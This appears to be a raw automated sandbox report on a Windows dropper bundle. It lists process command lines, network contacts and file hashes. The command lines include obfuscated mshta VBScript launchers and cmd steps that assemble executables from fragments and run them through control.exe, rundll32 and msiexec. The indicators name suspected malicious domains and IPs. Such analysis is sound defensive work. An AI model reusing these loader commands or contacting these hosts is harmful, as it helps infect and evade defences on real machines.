"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1028 -ip 1028
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 944
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 972
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 992
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 932
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 127.0.0.1:65269 | | tcp |
| N/A | 127.0.0.1:65271 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | c93901703b1d556d494f7a31ffb04720 |
| SHA1 | d14e2dc239ac85e6020f1fc4c035f7d2ea72d262 |
| SHA256 | 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631 |
| SHA512 | 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3952-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-65-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3952-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-75-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1084-76-0x0000000002670000-0x00000000026A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
memory/1084-77-0x0000000004EF0000-0x0000000005518000-memory.dmp
memory/3952-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-68-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-67-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-64-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3952-63-0x0000000000C70000-0x0000000000CFF000-memory.dmp
memory/3952-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3952-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/1084-101-0x0000000005790000-0x00000000057F6000-memory.dmp
memory/1084-99-0x0000000005620000-0x0000000005642000-memory.dmp
memory/3824-104-0x0000000000560000-0x00000000005C8000-memory.dmp
memory/1084-100-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4yl2515.joc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1084-111-0x0000000005800000-0x0000000005B54000-memory.dmp
memory/672-110-0x0000000000290000-0x00000000002AA000-memory.dmp
memory/3824-112-0x0000000004E00000-0x0000000004E76000-memory.dmp
memory/672-115-0x0000000000A50000-0x0000000000A56000-memory.dmp
memory/3824-114-0x0000000004DA0000-0x0000000004DBE000-memory.dmp
memory/3824-125-0x0000000005620000-0x0000000005BC4000-memory.dmp
memory/1084-126-0x0000000005C60000-0x0000000005C7E000-memory.dmp
memory/116-127-0x00000000066C0000-0x000000000670C000-memory.dmp
memory/1428-129-0x0000000000400000-0x0000000000883000-memory.dmp
memory/672-130-0x000000001B1D0000-0x000000001B2D2000-memory.dmp
memory/3952-140-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-139-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3952-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-137-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-135-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3952-131-0x0000000000400000-0x000000000051B000-memory.dmp
memory/116-151-0x0000000007140000-0x0000000007172000-memory.dmp
memory/116-152-0x000000006D1B0000-0x000000006D1FC000-memory.dmp
memory/116-163-0x0000000007420000-0x00000000074C3000-memory.dmp
memory/116-162-0x0000000006760000-0x000000000677E000-memory.dmp
memory/1084-164-0x000000006D1B0000-0x000000006D1FC000-memory.dmp
memory/1064-178-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1064-182-0x0000000005240000-0x000000000534A000-memory.dmp
memory/116-181-0x0000000007B50000-0x00000000081CA000-memory.dmp
memory/1064-184-0x0000000005170000-0x00000000051AC000-memory.dmp
memory/116-183-0x00000000071F0000-0x000000000720A000-memory.dmp
memory/1064-180-0x0000000005110000-0x0000000005122000-memory.dmp
memory/1064-179-0x0000000005630000-0x0000000005C48000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/1084-185-0x0000000007000000-0x000000000700A000-memory.dmp
memory/116-186-0x0000000007720000-0x00000000077B6000-memory.dmp
memory/116-187-0x00000000076B0000-0x00000000076C1000-memory.dmp
memory/116-208-0x00000000076E0000-0x00000000076EE000-memory.dmp
memory/116-209-0x00000000076F0000-0x0000000007704000-memory.dmp
memory/116-210-0x00000000077E0000-0x00000000077FA000-memory.dmp
memory/1084-211-0x00000000072A0000-0x00000000072A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
| MD5 | 4bf3493517977a637789c23464a58e06 |
| SHA1 | 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4 |
